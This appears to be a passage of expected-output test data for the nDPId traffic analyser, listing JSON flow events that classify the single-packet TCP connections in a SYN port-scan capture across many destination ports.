+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 